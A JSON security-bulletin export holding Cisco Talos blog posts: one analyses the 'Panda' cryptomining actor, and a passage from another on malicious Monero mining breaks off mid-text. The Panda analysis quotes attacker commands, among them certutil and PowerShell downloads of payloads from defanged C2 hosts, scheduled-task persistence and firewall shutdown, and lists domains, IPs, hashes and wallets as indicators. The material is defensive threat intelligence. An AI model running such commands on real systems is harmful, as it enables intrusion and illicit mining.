"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-23T13:27:00", "type": "thn", "title": "Top 15 Vulnerabilities Attackers Exploited Millions of Times to Hack Linux Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4547", "CVE-2017-12611", "CVE-2017-5638", "CVE-2017-7657", "CVE-2017-9805", "CVE-2018-11776", "CVE-2018-7600", "CVE-2019-0230", "CVE-2020-11651", "CVE-2020-14179", "CVE-2020-14750", "CVE-2020-17496", "CVE-2020-25213", "CVE-2020-7961", "CVE-2021-29441"], "modified": "2021-08-23T13:27:54", "id": "THN:7FD924637D99697D78D53283817508DA", "href": "https://thehackernews.com/2021/08/top-15-vulnerabilities-attackers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2019-09-17T15:28:34", "description": "_By [Christopher Evans](<https://twitter.com/ccevans002>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n## \n\n\n## Executive summary\n\nA new threat actor named \"Panda\" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information. \n \nPanda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers \u2014 a group infamous for publishing information from the National Security Agency \u2014 and Mimikatz, an open-source credential-dumping program. \n \nTalos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread \"MassMiner\" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, IT services industries were affected in these campaigns. \n \n\n\n[](<https://1.bp.blogspot.com/-lf0T3p1bzKg/XYDfgN1h6mI/AAAAAAAAB7o/HvFMxzb8QhQbUO85JND7yrZfjwu7xAfTACLcBGAsYHQ/s1600/image4.png>)\n\n## \n\n\n## First sightings of the not-so-elusive Panda\n\nWe first observed this actor in July of 2018 exploiting a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) to drop a miner that was associated with a campaign called \"[MassMiner](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>)\" through the wallet, infrastructure, and post-exploit PowerShell commands used. \n \nPanda used massscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). They used PowerShell post-exploit to download a miner payload called \"downloader.exe,\" saving it in the TEMP folder under a simple number filename such as \"13.exe\" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000. \n\n\n[](<https://1.bp.blogspot.com/-7Ed1781BBr4/XYDfrwNRtKI/AAAAAAAAB7s/nxr6w2FndDcpsmMKiH8a45uPRZmxCy3FgCLcBGAsYHQ/s1600/image6.png>)\n\n \nBy October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times. \n\n\n[](<https://1.bp.blogspot.com/-fpXoN_jw0UU/XYDfx_msBlI/AAAAAAAAB70/SEJLWIIEjUI0rt_HBXROjCsy3KH2RXUrACLcBGAsYHQ/s1600/image5.png>)\n\nThe sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block. \n \nOne of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name \"Panda.\" \n \n\n\n## Bulehero connection\n\nAround the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called \"download.exe\" from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as \"13.exe\" and execute it. The file server turned out to be an instance of HFS hosting four malicious files. \n\n\n[](<https://1.bp.blogspot.com/-GbyctYMnyRo/XYDgCR5tbSI/AAAAAAAAB78/3xs1gHqsMD8svymJLjA81TtAbCC4XsTZwCLcBGAsYHQ/s1600/image8.png>)\n\n \nRunning the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining. \n \nAdditionally, the sample attempts to shut down the victim's firewall with commands such as \"cmd /c net stop MpsSvc\". The malware also modifies the access control list to grant full access to certain files through running cacsl.exe. \n \nFor example: \n\n\n> cmd /c schtasks /create /sc minute /mo 1 /tn \"Netframework\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\appveif.exe /p everyone:F\n\nBoth of these behaviors have also been observed in previous MassMiner infections. \n \nThe malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign. \n \nAdditionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the \"Shadow Brokers\" exploits and were installed in a suspiciously named directory: \"\\Windows\\InfusedAppe\\Eternalblue139\\specials\\\". \n \n\n\n## Evolution of Panda\n\nIn January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China. \n \nPanda used this vulnerability to both directly download a file called \"download.exe\" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path \"/public/hydra.php\", which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to \"/public/hydra.php\". Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations. \n \nIn March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in. \n \nAt the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called \"download.exe\" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename i.e. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named \"wercplshost.exe\" from fid[.]hognoob[.]se as well as a configuration file called \"cfg.ini\" from uio[.]hognoob[.]se, which provides configuration details for the miner. \n\n\n[](<https://1.bp.blogspot.com/-6B6MTCm_3U8/XYDgMB6l-xI/AAAAAAAAB8A/g3ux2o0d2KgGC-H6Sy9BiLx4KUTSo8LwQCLcBGAsYHQ/s1600/image7.png>)\n\n \n\"Wercplshost.exe\" contains exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords. \n \nSoon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: \"certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\\Windows\\Temp\\upnpprhost.exe\". The coinminer is also run using the command \"cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\ugrpkute\\\\[filename].exe\". \n \nThe updated payload still includes exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits. One departure, however, is previously observed samples acquire the victim's internal IP and reach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on public IP addresses saving the results to \"Scant.txt\" (note the typo). The sample also writes a list of hardcoded IP ranges to \"ip.txt\" and passes it to Masscan to scan for port 445 and saves the results to \"results.txt.\" This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords \n \nIn June, Panda began targeting a newer WebLogic vulnerability, [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>), but their TTPs remained the same. \n \n\n\n## Recent activity\n\nPanda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of \"a\" - \"z\" characters and the last five consisting of digits (e.g., \"xblzcdsafdmqslz19595.exe\"). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se. \n \nBesides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz. \n \nOne difference is that several samples contained a Gh0st RAT default mutex \"DOWNLOAD_SHELL_MUTEX_NAME\" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior. \n \nOn August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as \"BBBBB,\", instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18. \n \nIn line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to \"oo[.]mygoodluck[.]best:51888:WervPoxySvc\", and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club. \n \nCisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best. \n\n\n[](<https://1.bp.blogspot.com/-2-PgtrQPKAE/XYDgeQ-XHeI/AAAAAAAAB8Q/2AJE3Rk0IHURq9oeqIjqMw-Ft37AHxp_ACLcBGAsYHQ/s1600/image1.png>)\n\n[](<https://1.bp.blogspot.com/-uPJKV52J9K0/XYDgjBhDZaI/AAAAAAAAB8U/sfPHOODu5c8pmRVRrcPdlaQ6G-VnpW9VQCLcBGAsYHQ/s1600/image3.png>)\n\n## \n\n\n## Conclusion\n\nPanda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated. \n \nHowever, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold. \n \nPanda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and is quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their activity in order to thwart their operations. \n\n\n## \n\n\n## COVERAGE\n\nFor coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://talosintelligence.com/resources/65>) \n \n\n\n[](<https://1.bp.blogspot.com/-VoLoSQumND8/XYDgUqa4CvI/AAAAAAAAB8I/dQAoulvM4nofqrokMtgPSQZJYLLOLLmZwCLcBGAsYHQ/s1600/image2.png>)\n\nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nNetwork Security appliances such as[ Next-Generation Firewall (NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n\n\n## IOCs\n\n### Domains\n\na45[.]bulehero[.]in \na46[.]bulehero[.]in \na47[.]bulehero[.]in \na48[.]bulehero[.]in \na88[.]bulehero[.]in \na88[.]heroherohero[.]info \na[.]bulehero[.]in \naic[.]fxxxxxxk[.]me \naxx[.]bulehero[.]in \nb[.]bulehero[.]in \nbulehero[.]in \nc[.]bulehero[.]in \ncb[.]fuckingmy[.].life \ncnm[.]idc3389[.]top \ndown[.]idc3389[.]top \nfid[.]hognoob[.]se \nfxxk[.]noilwut0vv[.]club \nhaq[.]hognoob[.]se \nidc3389[.]top \nidc3389[.]cc \nidc3389[.]pw \nli[.]bulehero2019[.]club \nlist[.]idc3389[.]top \nmi[.]oops[.]best \nmx[.]oops[.]best \nnrs[.]hognoob[.]se \noo[.]mygoodluck[.]best \npool[.]bulehero[.]in \npxi[.]hognoob[.]se \npxx[.]hognoob[.]se \nq1a[.]hognoob[.]se \nqie[.]fxxxxxxk[.]me \nrp[.]oiwcvbnc2e[.]stream \nuio[.]heroherohero[.]info \nuio[.]hognoob[.]se \nupa1[.]hognoob[.]se \nupa2[.]hognoob[.]se \nwiu[.]fxxxxxxk[.]me \nyxw[.]hognoob[.]se \nzik[.]fxxxxxxk[.]me \n\n\n### IPs\n\n184[.]168[.]221[.]47 \n172[.]104[.]87[.]6 \n139[.]162[.]123[.]87 \n139[.]162[.]110[.]201 \n116[.]193[.]154[.]122 \n95[.]128[.]126[.]241 \n195[.]128[.]127[.]254 \n195[.]128[.]126[.]120 \n195[.]128[.]126[.]243 \n195[.]128[.]124[.]140 \n139[.]162[.]71[.]92 \n3[.]123[.]17[.]223 \n46[.]173[.]217[.]80 \n5[.]56[.]133[.]246 \n\n\n### SHA-256\n\n2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1 \nfa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220 \n2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb \n829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08 \n8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec \n1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27 \n0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5 \nf9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a \n34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976 \na415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1 \n4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c \n8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21 \n991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e \na3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1 \n9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3 \nd5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d \n\n\n### Monero Wallets\n\n49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126 \n4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh \n44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L \n \n", "cvss3": {}, "published": "2019-09-17T08:09:45", "type": "talosblog", "title": "Cryptocurrency miners aren\u2019t dead yet: Documenting the voracious but simple \u201cPanda\u201d", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T08:09:45", "id": "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3w3NM3N6VuY/panda-evolution.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-31T17:59:53", "description": "## The Dark Side of the Digital Gold Rush\n\n \n_This post was authored by [Nick Biasini](<https://twitter.com/infosec_nick>), [Edmund Brumaghin](<https://www.blogger.com/profile/10442669663667294759>), [Warren Mercer](<https://twitter.com/securitybeard?lang%3Den>) and [Josh Reynolds](<https://www.twitter.com/JershMagersh>) with contributions from [Azim Khodijbaev](<https://twitter.com/ashukuhi>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n[](<https://1.bp.blogspot.com/-arFNhXlv5Mw/WnHgQ5o5WDI/AAAAAAAABpc/R8cgpTc4WnsyovMYujbV815KaTNd1mQgwCLcBGAs/s1600/pan-gold_transp.png>)\n\n_ \n_ \n\n\n## Executive Summary\n\n \nThe threat landscape is constantly changing; over the last few years malware threat vectors, methods and payloads have rapidly evolved. Recently, as cryptocurrency values have exploded, mining related attacks have emerged as a primary interest for many attackers who are beginning to recognize that they can realize all of the financial upside of previous attacks, like ransomware, without needing to actually engage the victim and without the extraneous law enforcement attention that comes with ransomware attacks. \n \nThis focus on mining isn't entirely surprising, considering that various cryptocurrencies along with \"blockchain\" have been all over the news as the value of these currencies has exponentially increased. Adversaries have taken note of these gains and have been creating new attacks that help them monetize this growth. Over the past several months Talos has observed a marked increase in the volume of cryptocurrency mining software being maliciously delivered to victims. \n \nIn this new business model, attackers are no longer penalizing victims for opening an attachment, or running a malicious script by taking systems hostage and demanding a ransom. Now attackers are actively leveraging the resources of infected systems for cryptocurrency mining. In these cases the better the performance and computing power of the targeted system, the better for the attacker from a revenue generation perspective. IoT devices, with their lack of monitoring and lack of day to day user engagement, are fast becoming an attractive target for these attackers, as they offer processing power without direct victim oversight. While the computing resources within most IoT devices are generally limited, the number of exposed devices that are vulnerable to publicly available exploits is high which may make them attractive to cyber criminals moving forward. \n \nTo put the financial gains in perspective, an average system would likely generate about $0.25 of Monero per day, meaning that an adversary who has enlisted 2,000 victims (not a hard feat), could generate $500 per day or $182,500 per year. Talos has observed botnets consisting of millions of infected systems, which using our previous logic means that these systems could be leveraged to generate more than $100 million per year theoretically. It is important to note that due to volatility present across cryptocurrency markets, these values may change drastically from day to day. All calculations in this blog were made based on XMR/USD at the time of this writing. \n \nThis is all done with minimal effort following the initial infection. More importantly, with little chance of being detected, this revenue stream can continue in perpetuity. While these are impressive figures, it's also important to factor in a few details that can further increase the value of these attacks exponentially: \n\n\n * The value of many cryptocurrencies are skyrocketing. Monero, one of the most popular mining targets, saw a 3000% increase over the last 12 months.\n * These attacks are much stealthier than their predecessors. Attackers are not stealing anything more than computing power from their victims and the mining software isn't technically malware -- So theoretically, the victims could remain part of the adversary's botnet for as long as the attacker chooses.\n * Once the currency is mined, there is no telling what the attacker might do with it. This could become a long term investment (or even retirement) scheme for these attackers \u2013 sitting on this currency until it hits such a point where the attacker decides to cash in. \n\n## \n\n## Introduction\n\n \nThroughout the past couple of years ransomware has dominated the threat landscape and for good reason. It creates a highly profitable business model that allows attackers to directly monetize their nefarious activities. However, there are a couple of limitations with the use of ransomware. First is the fact that only a small percentage of infected users will actually pay the ransom demanded by the attacker. Second, as systems and technology get better at detecting and blocking ransomware attacks the pool of possible victims is changing. Potential victims in many countries lack the financial capabilities to pay $300-$500 to retrieve their data. Possibly related to these aforementioned limitations, we have begun to see a steady shift in the payloads that are being delivered. This is especially true for some of the most common methods for malware distribution such as exploit kits and spam campaigns. \n \nOver the past several months Talos has started to observe a marked increase in the volume of cryptocurrency miners being delivered to victims. Cryptocurrency and \"blockchain\" have been all over the news over the past several months as the value of these currencies has increased on an exponential path. One of the most effective ways to generate these currencies is through mining and adversaries are obviously paying attention. \n \n\n\n## What is 'Mining'?\n\n \nAt a high level mining is simply using system resources to solve large mathematical calculations which result in some amount of cryptocurrency being awarded to the solvers. Before we get too deep into mining let's address the currencies that make sense to mine. \n \nBitcoin (BTC) is the most well known and widely used cryptocurrency by a wide margin. It's been mined since its inception, but today mining isn't an effective way to generate value. If you look across all of the cryptocurrencies, there are only a couple that are worth mining without specialized hardware called ASICs (Application Specific Integrated Circuits). The differences across the different cryptocurrencies are based on the hashing algorithm used. Some have been specifically designed in an attempt to prevent or hinder the use of such specialised hardware and are more focused on consumer grade equipment such as CPU & GPU hardware. Currently, the most valuable currency to mine with standard systems is Monero (XMR) and adversaries have done their research. In addition Monero is extremely privacy conscious and as governments have started to scrutinize Bitcoin more closely, Monero and other coins with heavy emphasis on privacy may become a safe haven for threat actors. \n \nThere are two ways that mining can be performed, either with a stand alone miner or by leveraging mining pools. Pool-based crypto mining allows you to pool the resources of multiple systems resulting in a higher hashrate and theoretically the production of increased amounts of currency. It's pool-based mining of Monero that we have seen most frequently leveraged by attackers as it allows for the greatest amount of return on investment and the required mining software can be easily delivered to victims. The use of pooled mining also maximizes the effectiveness of the computing resources found in standard systems that attackers attempt to compromise. This is similar to launching Distributed Denial of Service (DDoS) attacks where 100,000 machines flooding a target with bogus traffic becomes much more effective compared to a single system under the attacker's control sending bogus traffic. \n \n\n\n## How does pool based mining work?\n\n \nPool-based mining is coordinated through the use of 'Worker IDs'. These IDs are what tie an individual system to a larger pool and ensures the coin mined by the pool that is associated with a particular Worker ID are delivered to the correct user. It's these Worker IDs that allowed us to determine the size and scale of some of the malicious operations as well as get an idea of the amount of revenue adversaries are generating. For the purposes of this discussion we will be assuming the following: \n\n\n 1. The amount of hashes per second that a typical computer can compute will be assumed to be ~125 H/s.\n 2. While in reality mining does not always guarantee successful generation of the cryptocurrency being mined, we will assume that for our purposes it is successful as it allows for a better understanding of the earning potential for these malicious mining pools.\nThese miners typically operate from the command line and make use of a series of arguments used to establish how the mining should be performed. A typical example of the command line syntax used to execute the mining software and specify the arguments is below: (note that there are variations in the parameter names used based on the specific mining software being used.) \n\n\n[](<https://2.bp.blogspot.com/-ZmEzpdA1pzU/WnG17Z6ncAI/AAAAAAAAAkM/v_-jqvA3Tx4v4Ifg6PSTn6xHAxs92brwgCLcBGAs/s1600/image7.png>)\n\n**Example Command Line Syntax**\n\n \nAs you can see there are two primary argument values required: The URL for the mining pool and the 'Worker ID' that is used to tie the mining activity taking place on the system to a specific mining pool which is used to manage how payouts are conducted. However, through our investigation we have found a plethora of other parameters that attackers or miners can specify in an attempt to hide their activities. If the mining software is executed without these options, victims might notice significant performance degradation on their systems as no computing resource limits are enforced. These options include: \n\n\n * Limits on CPU Usage.\n * Limits on System Temperature.\n * Amount of cores being used.\n * Sleep periods.\nEach mining program comes with its own set of flags that are taken advantage of in various ways by both legitimate and malicious miners. We have observed that these options are typically deployed by the attackers when they achieve persistence (i.e. through the creation of Scheduled Tasks or Run keys that execute the miner using the Windows Command Processor specifying the arguments to use). \n \n\n\n## Origins on the Underground\n\n \nTalos has been observing discussions regarding the use of crypto miners as malicious payloads by both Chinese and Russian crimeware groups. We first observed Chinese actors discussing miners and the associated mining botnets in November 2016 and the interest has been steadily building since that time. \n \nFrom a Russian underground perspective there has been significant movement related to mining in the last six months. There have been numerous discussions and several offerings on top-tier Russian hacking forums. The discussions have been split with the majority of the discussion around the sale of access to mining bots as well as bot developers looking to buy access to compromised hosts for the intended purpose of leveraging them for crypto mining. The popularity increase has also been accompanied with a learning curve associated with mining, including a better understanding around how much coin can be mined and the opportune times to conduct the mining activity. As far as the malware that can be used to conduct mining, most of them are written in C# or C++ and as is common on these forums they are advertised with low detection rate, persistence, and constant development. In many cases we are observing updates to these threats on a daily or weekly basis. \n \nIn general the attackers have been pleased with the amount of revenue the bots generate as well as the potential to grow that revenue. This is indicative of a threat that is poised to become more pervasive over time. Let's take a look at how malicious mining works and the threats that are delivering them. \n \n\n\n## Malicious Mining\n\n \nMalicious mining is the focus of this post since its an emerging trend across the threat landscape. Adversaries are always looking for ways to monetize their nefarious activities and malicious mining is quickly becoming a cash cow for the bad guys. \n \nOver the past several years ransomware has dominated the threat landscape from a financially motivated malware perspective and with good reason. It is an extremely profitable business model as we've shown through our Angler Exploit Kit [research](<https://www.talosintelligence.com/angler-exposed/>) where we estimate that the adversaries behind Angler could have been conservatively making at least $30 million annually. However, with success comes attention and with that attention came an increased focus on stopping this type of activity. Both operating systems and security vendors got better at stopping ransomware before it affected much of the system. \n \nAdversaries are left with an interesting decision, continue leveraging ransomware as a primary source of revenue as the pool of users and vulnerable systems continues to shrink or begin leveraging other payloads. There are no shortage of options available to bad guys including banking trojans, bots, credential stealers, and click-fraud malware to name a few. \n \nSo why choose crypto mining software? \n \nThere are many reasons why adversaries might choose to leverage crypto mining to generate revenue. One likely reason is that this is a largely hands off infection to manage. Once a system has a miner dropped on it and starts mining nothing else is needed from an adversary perspective. There isn't any command and control activity and it generates revenue consistently until its removed. So if an adversary notices a drop off in nodes mining to their pool it's time to infect more systems. Another is that it's largely unnoticed by the majority of users. Is a user really going to notice that mining is going on while they are reading their email, browsing the web, or writing up their latest proposal? From this perspective miners are the polar opposite of ransomware, hiding under the users purview for as long as possible. The longer the user doesn't notice the miner running the larger potential payout for the activity. \n \nThe biggest reason of them all is the potential monetary payout associated with mining activity. If it didn't generate a profit, the bad guys wouldn't take advantage of it. In this particular vein malicious miners could be a pretty large source of revenue. The biggest cost associated with mining is the hardware to mine and the electricity to power the mining hardware. By leveraging malicious miners attackers can take both of those costs out of the equation altogether. Since they are able to take advantage of computing resources present in infected systems, there is no cost for power or hardware and attackers receive all the benefits of the mined coin. \n \nLet's take a deeper dive on the amount of revenue these systems can potentially generate. As mentioned earlier the hashrate for computers can vary widely depending on the type of hardware being used and the average system load outside of the miners. An average system would likely compute somewhere around 125 hashes per second. One system alone without any hardware or electricity cost would generate about $0.25 of Monero a day, which doesn't seem like a lot but when you start pooling systems the amount of earning potential increases rapidly. \n \nSome of the largest botnets across the threat landscape consist of millions of infected systems under the control of an attacker. Imagine controlling a small fraction of the systems that are part of one of these botnets (~2,000 hosts). The amount of revenue that can be generated per day increases considerably to more than $500 in Monero per day or $182,500 per year. As we will demonstrate later 